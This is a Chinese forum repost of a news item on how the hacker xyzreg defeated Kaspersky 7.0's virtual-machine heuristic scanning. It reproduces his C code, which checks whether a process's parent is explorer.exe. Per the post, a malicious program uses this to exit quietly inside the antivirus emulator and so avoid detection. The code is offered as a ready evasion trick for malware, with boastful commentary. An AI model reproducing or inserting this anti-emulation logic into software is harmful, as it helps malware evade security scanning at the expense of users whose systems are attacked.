[分享]卡巴最新高级虚拟机启发式查毒技术被中国黑客攻破
卡巴最新高级虚拟机启发式查毒技术被中国黑客攻破
11月9日,中国著名黑客xyzreg(著名的安全漏洞、安全软件研究者,曾在中国安全第一峰会 -- 安全焦点2007峰会上做新型恶意软件技术相关的议题演讲,演讲中演示了如何穿透卡巴斯基、诺顿、Mcafee等安全软件的主动防御体系等内容)在其BLOG上发表了一篇如何攻破卡巴斯基7.0的 “新型高级虚拟机启发式查毒技术”的文章,并提供了相应代码。
代码可以检测恶意程序自身是否在卡巴斯基7.0的虚拟机中运行,如果发现被卡巴斯基的虚拟机运行,则自动退出,从而使卡巴斯基无法发现程序中包含的恶意代码
xyzreg在其BLOG上发表了一篇如何攻破卡巴斯基7.0的 “新型高级虚拟机启发式查毒技术”的文章,如下:
被我十几行代码就咔嚓了,而且还没用奇技淫巧,呵呵:
DWORD fpid,epid;
void VMM()
{
PROCESSENTRY32 pe;
HANDLE hkz=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
pe.dwSize=sizeof(PROCESSENTRY32);
if (Process32First(hkz,&pe))
{
do
{
if (pe.th32ProcessID==GetCurrentProcessId())
{
fpid=pe.th32ParentProcessID;
}
if (stricmp(pe.szExeFile,"explorer.exe")==0)
{
epid=pe.th32ProcessID;
}
}
while(Process32Next(hkz,&pe));
}
}
主函数里:
VMM();
if(fpid!=epid)
return 0;
不明白?那就不要看了,常识啊常识……
